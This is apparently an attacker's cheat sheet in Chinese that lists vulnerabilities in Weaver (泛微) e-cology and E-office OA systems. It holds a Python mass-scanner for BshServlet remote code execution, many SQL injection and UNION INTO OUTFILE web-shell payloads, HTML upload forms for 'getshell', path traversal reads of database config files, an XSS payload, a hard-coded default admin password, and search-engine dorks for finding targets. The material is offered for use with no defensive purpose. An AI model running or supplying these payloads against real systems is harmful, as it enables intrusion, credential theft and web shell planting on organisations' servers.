接口
/login/Login.jsp?logintype=1 #前台登錄
2019年
泛微e-cology OA數據庫配置信息泄漏
包括不限於8.0、9.0版本
/mobile/dbconfigreader.jsp
2019年
泛微e-cology OA系統V8、V9版本SQL注入(暫未發現公開poc)
2019年 泛微e-cology OA系統遠程代碼執行
Fofa Dork app="泛微-協同辦公OA"0x02 影響范圍
包括但不限於7.0,8.0,8.1
/weaver/bsh.servlet.BshServlet/
單個|批量POC
import requests
import argparse
def verify(url,payload):
if 'http' not in url:
url = 'http' + "://" + url
Furl=url+"/weaver/bsh.servlet.BshServle"
with open("Vuln_list.txt",'a') as Vlist:
try:
res = requests.post(Furl, data = payload)
if res.status_code == 200:
if "Error:" not in res.text:
print(Furl + "is a vuln [Verify Success!]\n")
Vlist.write(url+'\n')
#
# else:
# print(str(res.status_code) + '\n' + Furl + '\n')
except Exception:
return
def ecologyexp(urls,mode):
payload={"bsh.script":"exec(\"whoami\")","bsh.servlet.output":"raw"}
if mode == '1':
verify(urls,payload)
elif mode == '2':
with open(urls) as uFile:
for url in uFile.readlines():
try:
verify(url, payload)
except Exception as e:
print(e)
continue
else:
pass
parser = argparse.ArgumentParser(description='e-cology verify',epilog="python2 e-cology-EXP.py -u url -m 1 || python2 e-cology-EXP.py -url url.txt -m 2")
parser.add_argument('--url','-u',help='')
parser.add_argument('--mode','-m',help='',default=1)
parser.add_argument('--urlList','-ul',help='')
parser.add_argument('--level','-lv',help='',default=1)
args = parser.parse_args()
if __name__ == '__main__':
with open("vuln_list.txt",'w') as vF:
vF.write("vuln_list\n")
try:
if args.urlList is not None:
ecologyexp(args.urlList,args.mode)
else:
ecologyexp(args.url, args.mode)
except Exception as e:
print(e)
CNVD-2019-34241
/mobile/browser/WorkflowCenterTreeData.jsp
受影響版本
泛微e-cology OA系統 JSP版本
Payload:
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
缺陷編號:wooyun-2015-0132247
漏洞標題:泛微OA辦公系統一處通用SQL注入(需要登陸)
包含6.0及7.0版本
/workflow/FormBillBrowser.jsp
參數:formName 拼接sql未過濾
wooyun-2015-0137850
泛微OA系統通用任意文件上傳getshell(附官方案例)
影響6.0、7.0、7.100、8.0(需要登錄)
/page/maint/common/UserResourceUpload.jsp?dir=/
(1)存在文件上傳繞過(更改后綴:1.jsp.,1.jspx ; 0x00截斷)
(2)上傳路徑可控
payload:
<form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
wooyun-2015-0140003
泛微OA通用系統三處SQL注入打包(官網可復現無需登錄)
(1)/mobile/plugin/loadWfGraph.jsp requestid
(2)//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1 nodeid
(3)//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2* id
缺陷編號:wooyun-2016-0178866
漏洞標題:泛微OA某接口無需登錄可執行任意SQL語句(附腳本)
/ws /ws/query?wsdl XML注入
缺陷編號:wooyun-2016-0169872
漏洞標題:泛微OA某處缺陷可遍歷和操作系統文件
plugin\ewe\jsp\config.jsp
sUsername = "sysadmin";
sPassword = "weaversoft"
(1)/plugin/ewe/admin/default.jsp 新建文件1.txt
(2)越權刪除文件: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../
wooyun-2015-0155705
泛微OA未授權可導致GetShell
/sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp
上傳馬路徑:/sysinterface/extpage/ccccc.jsp
路徑可控:
/sysinterface/codeEdit.jsp?filename=。../../ccccc.jsp&filetype=jsp
上傳馬路徑:http://url/ccccc.jsp
缺陷編號:wooyun-2015-0141834
漏洞標題:雨潤集團泛微OA系統表單任意上傳拿shell
/tools/SWFUpload/upload.jsp
payload:
<form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
上傳馬路徑:http://url/shell.jsp
缺陷編號:wooyun-2015-0138725
漏洞標題:泛微OA通用系統存在SQL注入漏洞(官網可復現無需登錄)
/mobile/plugin/PreDownload.jsp url sql拼接未過濾
缺陷編號:wooyun-2015-0132258
漏洞標題:泛微OA系統存在SQL注入漏洞(附測試腳本)
/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams= //keywordid Oracle 布爾盲注
反射型XSS:/main/login.jsp
Payload: 1'"()&%<ScRiPt >prompt(930551)</ScRiPt>
缺陷編號:wooyun-2015-0129483
漏洞標題:泛微OA系統敏感文件未授權訪問
/messager/users.data XML格式數據base64加密
缺陷編號:wooyun-2015-0127502
漏洞標題:泛微OA某處通用注入(不需登錄)
/web/WebSearchDsp.jsp?key=1 //key
缺陷編號:wooyun-2015-0125738
漏洞標題:泛微OA系統漏洞缺陷打包
SQL注入(需登陸)
(1)
http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5 //requestid
(2)
/ServiceAction/com.eweaver.base.orgunit.servlet.OrgunitTreeAction?action=getChildrenExt&type=orgdef&sqlwhere=&node=Orgunit_402881e70ad1d990010ad1e5ec930008&reftype=402881e510e8223c0110e83d427f0018 //reftype
越權(需登陸)
(1)
/main/main.jsp 個人信息——》上傳頭像圖片-》抓包捕獲到get請求(該請求可在瀏覽器訪問)
/humres/base/uploadavatar.jsp?id=4022141241232(修改id即可修改他人頭像)
(2)
/ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=用戶id&v=0&fieldName=isclosed //越權修改用戶權限(v參數控制用戶是否可以登陸-》sysuser表中isclosed字段)
存儲型XSS(需登陸)
個人中心->個人信息->詳細信息-》英文名稱
缺陷編號:wooyun-2015-0104678 (泛微oa的e-Mobile)
漏洞標題:泛微oa某系統通用注入漏洞(5案例)
4.5,4.6版本存在注入 盲注/延遲注入
Payload:
-1' OR (8705=8705) AND 'a'='a
缺陷編號:wooyun-2014-076191
漏洞標題:泛微OA漏洞集合·2(SQL注入/文件上傳getshell)
0x01:SQL注入漏洞 4 處
(1)
POST /general/new_mytable/content_list/
content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1
block_id=1901&body_width=1121&_= //block_id
(2)
/general/address/view/view_detail.php?ADD_ID=-169%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 //ADD_ID
(3)
/general/address/docenter/export_do.php?group_id=19%20UNION%20SELECT%20user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16 //group_id
(4)
/general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1 //content_id
0x02:文件上傳導致Getshell
/general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID=
//cvs --> php
缺陷編號:wooyun-2014-074972
漏洞標題:泛微OA漏洞集合(sql注入、未授權訪問等)
0x01:越權(需登陸)
(1)
/general/email/new/index.php?EMAIL_ID=7 //EMAIL_ID
(2)
/ikernel/admin/
0x02:SQL注入(需登陸)
(1)
/ikernel/admin/IK_TABLE/field/?TABLE_ID=9 //TABLE_ID
0x03:文件下載
/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
0x04:文件上傳
/general/email/ 內部郵件-》新建郵件-》上傳 “php4”
shell驗證:/attachment/源碼中找到的部分路徑/文件名.php4
缺陷編號:wooyun-2014-069288
漏洞標題:泛微OA系統通用后台幾處注入(官方demo驗證)
(1)
/systeminfo/sysadmin/sysadminEdit.jsp?id=1 //id 管理員權限
(2)
//cowork/CoworkLogView.jsp?id=151 //id 普通用戶權限
(3)
/system/basedata/basedata_role.jsp?roleid=32 //roleid 普通用戶權限
(4)
//system/basedata/basedata_hrm.jsp?resourceid=3 //resourceid 普通用戶權限
缺陷編號:wooyun-2013-039855
漏洞標題:泛微E-office OA管理系統# 驗證其通用性:SQL注入、任意文件下載、文件上傳等漏洞
(1)phpmyadmin #無需認證可登陸
(2)SQL注入
/general/news/show/read_news.php?NEWS_ID=214%20and%201=2%20union%20select%201,user(),database(),4,5,6 //NEWS_ID
(3)文件下載
/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 (zend加密)
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/mysql_config.ini&ATTACHMENT_ID=5402024843
(4)文件上傳
我的主頁-》編輯工作計划-》附件上傳-》php4
shell地址:/attachment/xxx/shell.php4
缺陷編號:WooYun-2015-0124589
漏洞標題:泛微某通用系統存在SQL注入漏洞(無需登錄)
(1)
/main/login.jsp 用戶名:sysadmin' --》報錯回顯
抓包:
/j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin' //j_username
(2)
/ServiceAction/com.eweaver.base.DataAction?sql=|20select|20*|20from|20v$version|20where|20rownum|20=|201 //可查看數據庫版本
wooyun-2015-0124788
1.未授權訪問及任意文件遍歷
/weaver/weaver.email.FileDownloadLocation?fileid=46&download=1
/weaver/weaver.file.filedownload?fileid=1
2.注入漏洞
/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1(泛微OA7) //fileid
缺陷編號:WooYun-2013-038914
漏洞標題:泛微E-office OA管理系統存在任意文件下載及文件上傳導致任意代碼執行(已getshell)
文件上傳
分析inc/utility_all.php 的源碼可知附件上傳的路徑為:attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME
個人日志->上傳附件,查看源碼得到相應的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值
從配置文件中可以知道,附件中未禁止php4格式的文件上傳,因此可以直接getshell(system權限)
wooyun-2015-0124027(sql語句任意執行)
/ServiceAction/com.eweaver.base.DataAction?sql=select LONGONNAME from SYSUSER where LOGONPASS = '密碼(base64加密)'
applychen(wooyun-2010-034523)泛微E-office OA管理系統存在SQL注射漏洞(未找到相關信息)
wooyun-2010-0137042(未找到相關信息)
缺陷編號:wooyun-2016-0215533
漏洞標題:泛微eweaver任意數據庫操作
/ws/query //webservice實現類QueryServiceImplquery中的queryBy可執行數據庫命令
缺陷編號:wooyun-2016-0191882
漏洞標題:泛微ecology系統所有版本SQL注入(官網為例)二
需普通用戶權限
影響范圍:
8.100.0531+KB81001511、 7.100.0331 、5.000.0327+KB50001107、 4.100.0919
缺陷編號:wooyun-2016-0198158
漏洞標題:泛微ecology無需登錄SQL注入2+任意文件讀取
(1)sql注入
SignatureDownLoad類中 markId參數未做過濾
(2)文件讀取
markPath參數可控
缺陷編號:wooyun-2016-0169453
漏洞標題:泛微協同商務系統e-cology某處SQL注入(附驗證中轉腳本)
//services/ //XML注入
缺陷編號:wooyun-2015-0164133
漏洞標題:泛微e-office官網存在奇葩漏洞可查看注冊人信息及更改產品信息
/eoffice_web/index.php?s=/admin/settings/register.html
/eoffice_web/index.php?s=/admin/update/update_list.html
缺陷編號:wooyun-2015-0148980
漏洞標題:泛微某通用系統設計缺陷遍歷目錄並可GetShell(需登錄)
1.目錄遍歷
//document/imp/filebrowser.jsp?dir=D:\\
2.文件上傳(需登陸)
xxx/base/skin/skincreate.jsp
shell路徑:/css/skins/skin4/shell.jsp
缺陷編號:wooyun-2015-0141786
漏洞標題:無需登錄sql注入泛微集團分權管理(e-cology)(某世界500強企業&demo復現)
/login/Login.jsp?logintype=1
登陸抓包-》
/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit= //loginid
缺陷編號:wooyun-2015-0136818
漏洞標題:泛微e-cology通用型4處SQL注入漏洞
1 注入點 /pweb/careerapply/HrmCareerApplyPerEdit.jsp,參數id
2 注入點 /pweb/careerapply/HrmCareerApplyPerView.jsp,參數id
3 注入點 /pweb/careerapply/HrmCareerApplyWorkEdit.jsp,參數id
4 注入點 /pweb/careerapply/HrmCareerApplyWorkView.jsp,參數id
5 注入點 /web/careerapply/HrmCareerApplyPerEdit.jsp,參數id
6 注入點 /web/careerapply/HrmCareerApplyPerView.jsp,參數id
7 注入點 /web/careerapply/HrmCareerApplyWorkEdit.jsp,參數id
8 注入點 /web/careerapply/HrmCareerApplyWorkView.jsp
缺陷編號:wooyun-2015-0136823
漏洞標題:泛微e-cology通用型6處SQL注入漏洞
1 注入點 /web/broswer/SectorInfoBrowser.jsp,參數sqlwhere
2 注入點 /web/broswer/CustomerTypeBrowser.jsp,參數sqlwhere
3 注入點 /web/broswer/CustomerSizeBrowser.jsp,參數sqlwhere
4 注入點 /web/broswer/CustomerDescBrowser.jsp,參數sqlwhere
5 注入點 /web/broswer/ContacterTitleBrowser.jsp,參數sqlwhere
6 注入點 /web/broswer/CityBrowser.jsp,參數sqlwhere
缺陷編號:wooyun-2015-0136828
漏洞標題:泛微某系統存在通用型注入(以官網和中國移動為例)
(1)
/login.do -》登錄抓包 /verifyLogin.do //loginid
payload:
loginid: aaa' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a
password: 1
(2)
/client.do?method=getlist&sessionkey=xxx&module=7&scope=4&pageindex=1&keyword=1 //keyword (需登錄)
缺陷編號:wooyun-2015-0134994
漏洞標題:泛微e-cology通用性SQL注入漏洞(附腳本)
/web/careerapply/HrmCareerApplyAdd.jsp //careerid
缺陷編號:wooyun-2015-0130759
漏洞標題:某OA平台系統泄露所有賬戶密碼,包括管理員,無需登錄(已進入泛微自己的管理系統)
/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER
缺陷編號:wooyun-2015-0128007
漏洞標題:泛微eoffice前台getshell+一處小問題(無需登錄)
(1)sql注入
/inc/group_user_list/group_xml.php //par
Payload:
[group]:[1]|[groupid]:[1'] =》W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=
[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/axxxxxxxx.php'] =》W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==
(2)未授權訪問
/UserSelect/main.php
缺陷編號:wooyun-2015-0127270
漏洞標題:泛微eoffice兩處sql注入打包+一處越權(無需登錄)
(1)sql注入
/E-mobile/calendar_page.php //detailid
/E-mobile/diarymy_page.php //start
Payload:
1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)
(2)越權
E-mobile/email_page.php //detailid
缺陷編號:wooyun-2015-0126024
漏洞標題:泛微E-office注入篇之無需登陸注射第1-20處(附官網案例)
(1)
/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1 //參數RUN_ID
(2)
/E-mobile/flowdo_page.php?diff=delete&flowid=1 //參數flowid
(3)
/E-mobile/flowsorce_page.php?flowid=2 //flowid
(4)
/E-mobile/flownext_page.php?diff=candeal&detailid=2,3 //參數detailid
(5)
/E-mobile/flowimage_page.php?FLOW_ID=2 //FLOW_ID
(6)
/E-mobile/flowform_page.php?FLOW_ID=2 //FLOW_ID
(7)
/E-mobile/diaryother_page.php?searchword=23 //searchword
(8)
/E-mobile/create/ajax_do.php?diff=word&sortid=1 //參數sortid
(9)
/E-mobile/create/ajax_do.php?diff=word&idstr=2 //參數idstr
(10)
/E-mobile/create/ajax_do.php?diff=addr&sortid=1 //參數sortid
(11)
/E-mobile/create/ajax_do.php?diff=addr&userdept=1 //參數userdept
(12)
/E-mobile/create/ajax_do.php?diff=addr&userpriv=1 //參數userpriv
(13)
/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1 //參數idstr
(14)
/E-mobile/flow/flowhave_page.php?detailid=2,3 //detailid
(15)
/E-mobile/flow/flowtype_free.php?flowid=1 //flowid
(16)
/E-mobile/flow/flowtype_free.php?runid=1 //runid
(17)
/E-mobile/flow/flowtype_other.php?flowid=1 //flowid
(18)
/E-mobile/flow/flowtype_other.php?runid=1 //runid
(19)
/E-mobile/flow/freeflowimage_page.php?fromid=2 //fromid
(20)
/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2 //參數runid
缺陷編號:wooyun-2015-0125638
漏洞標題:泛微Eoffice 某2個文件多處任意文件讀取/多處任意文件上傳可直接getshell
文件讀取
(1)
Payload:
默認讀取目錄為/attachment/
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
(2)
Payload:
默認讀取目錄為/attachment/
/iweboffice/officeserver.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../mysql_config.ini
(3)
Payload:
默認讀取目錄為/attachment/
/iweboffice/officeserver.php?OPTION=GETFILE&REMOTEFILE=../mysql_config.ini
文件上傳
(1)
/iweboffice/officeserver.php?OPTION=SAVEFILE&FILENAME=shell.php
shell路徑:/attachment/shell.php
(2)
/iweboffice/officeserver.php?OPTION=SAVETEMPLATE&TEMPLATE=shell.php
shell路徑:/attachment/shell.php
(3)
case "SAVEASHTML"
(4)
case "SAVEIMAGE"
(5)
case "UPDATEFILE"
(6)
case "PUTFILE"
(7)
/webservice/upload/upload.php
Payload:
<form action="http://網站地址/ webservice/upload/upload.php" form enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(8)
/webservice-json/upload/upload.php
(9)
/webservice-xml/upload/upload.php
缺陷編號:wooyun-2015-0125592
漏洞標題:泛微Eoffice 三處任意文件上傳可直接getshell
(1)
/webservice/upload.php
Payload:
<form action="http://url/webservice/upload.php" form enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(2)
inc/jquery/uploadify/uploadify.php
Payload:
<form action="http://url/ inc/jquery/uploadify/uploadify.php" form enctype="multipart/form-data" method="POST">
<input name=" Filedata" type="file">
<input name="" type="submit">
</form>
(3)
/general/weibo/javascript/LazyUploadify/uploadify.php
Payload:
<form action="http://url/general/weibo/javascript/LazyUploadify/uploadify.php" form enctype="multipart/form-data" method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>
(4)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?uploadType=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214
-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php
<?php phpinfo();?>
-----------------------------94401197120954--
Shell路徑: /attachment/shell.php
(5)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?user_ID=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214
-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php
<?php phpinfo();?>
-----------------------------94401197120954--
Shell路徑: /attachment/personal/$userID/$userID_temp.php
缺陷編號:wooyun-2015-0125279
漏洞標題:泛微E-office 同一文件多處sql注射/用戶信息泄露(ROOT SHELL)
//webservice/eoffice.wsdl.php?wsdl (XML注入)
缺陷編號:wooyun-2015-0125286
漏洞標題:泛微e-office 任意文件下載
/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php
缺陷編號:wooyun-2015-0125282
漏洞標題:泛微E-office 3處sql注射(ROOT SHELL)/2處任意文件上傳
XML注入
(1)
webservice-json/login/login.wsdl.php?wsdl
(2)
/webservice/login/login.wsdl.php?wsdl
(3)
//webservice/eoffice.wsdl.php?wsdl
/webservice/eoffice.wsdl.php?wsdl
(4)
/webservice-xml/login/login.wsdl.php?wsdl
文件上傳
(1)
/webservice/upload.php
shell路徑:attachment/$attachmentID $attachmentID 會回顯
(2)
/webservice/upload/upload.php
(3)
webservice-json/upload/upload.php
缺陷編號:wooyun-2015-0124503
漏洞標題:泛微Eoffice某處文件存在多處SQL注入及可繞過登錄直接操作后台
sql注入
/client_converter.php //userAccount lang funcID
越權
步驟一:/client_converter.php?userAccount=admin&lang=cn(給session賦值)
步驟二:/general/system/user/userlist.php
缺陷編號:wooyun-2015-0112675
漏洞標題:泛微的OA系統(泛微E-COLOGY)存在嚴重的信息安全漏洞
/weaver/weaver.file.FileDownload?fileid=12
缺陷編號:wooyun-2015-0105535
漏洞標題:泛微Eoffice無需登錄的SQL注入(多處)
1
/E-mobile/diarydo.php //diary_id
2
/E-mobile/notify_page.php //detailid
3
/E-mobile/emailreply_page.php //detailid
4
/E-mobile/sms_page.php //detailid
5
/E-mobile/source_page.php //emailid
缺陷編號:wooyun-2015-0105520
漏洞標題:泛微e-office無需登錄GETSHELL
/E-mobile/Data/login_other.php
使用stripslashes進行反轉義,導致可以繞過GPC進行注入
Payload:
/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
/e-mobile/Data/login_other.php?diff=sync&auth={%22auths%22:[{%22value%22:%22-1%27%20UNION%20SELECT%201,2,%27%3C?php%20phpinfo();%20?%3E%27,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20into%20outfile%20%27D:/eoffice/webroot/shell.php%27%23%22}]}
shell路徑:http://url/shell.php
缺陷編號:wooyun-2015-0105290
漏洞標題:泛微e-office無需登錄注入一枚
/inc/priv_user_list/priv_xml.php //userpriv(數組型注入-需base64編碼)
缺陷編號:wooyun-2015-0104799
漏洞標題:泛微Eoffice多個文件SQL注入續(無需登錄)
/E-mobile/flowimg.php //FLOW_ID RUN_ID
缺陷編號:wooyun-2015-0104782
漏洞標題:泛微Eoffice多個文件SQL注入(無需登錄)
(1)
/eoffice/api/email.class.php //emailid
(2)
/E-mobile/source_page.php //emailid
(3)
/E-mobile/emailreply_page.php //emailid
(4)
/E-mobile/email_page.php //emailid
缺陷編號:wooyun-2014-087500
漏洞標題:泛微Eoffice無需登錄直接getshell
/mysql_config.ini
缺陷編號:wooyun-2014-082627
漏洞標題:泛微某系統通用型SQL注入漏洞打包(全版本)
(1)
/homepage/Homepage.jsp //hpid
(2)
/page/element/7/News.jsp //eid
(3)
/CRM/data/ViewCustomerBase.jsp //requestid
(4)
/page/element/compatible/view.jsp //eid
(5)
/page/element/Weather/View.jsp //eid
(6)
/proj/data/ViewProject.jsp //ProjID
缺陷編號:wooyun-2014-078802
漏洞標題:泛微e-cology系統又一sql注入(無需登錄)
homepage/LoginHomepage.jsp //hpid
缺陷編號:wooyun-2014-078769
漏洞標題:泛微e-cology存在sql注入(無需登錄)
/page/maint/login/Page.jsp //templateId
缺陷編號:wooyun-2014-076547
漏洞標題:泛微某系統漏洞集合(不拿shell不是合格的白帽子)
//需登錄
漏洞模塊為:我的郵件 -- 聯系人 -- 導入 -- 以逗號為分隔符的CVS文件
最終得到的文件路徑為:http://url/email/csv/上傳的文件名.jsp
缺陷編號:wooyun-2014-072571
漏洞標題:泛微eteams_oa系統越權修改任意用戶信息
//需登錄
缺陷編號:wooyun-2014-055521
漏洞標題:泛微E-office OA管理系統通過sql注入可以任意真實用戶名免密碼登陸
post請求,url為general/index.php,
smsid為1 union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1',兩者都經過DES3加密后再經過base64轉碼
缺陷編號:wooyun-2013-034523
漏洞標題:泛微E-office OA管理系統存在SQL注射漏洞可查庫
/general/file_folder/file_new/neworedit/index.php // CONTENT_ID
日志未授權訪問
/log/ecology_date.log
wooyun-2015-0125281(未找到相關信息)
wooyun-2015-0125265(未找到相關信息)
wooyun-2010-07497(未找到相關信息)
wooyun-2010-034523(未找到相關信息)
谷歌搜索 allintext: 用戶名: 密碼: 記住密碼. 自動登錄. E-Mobile
百度dork:泛微協同商務系統
ZoomEye搜索泛微/
Fofa Dork app="泛微-協同辦公OA"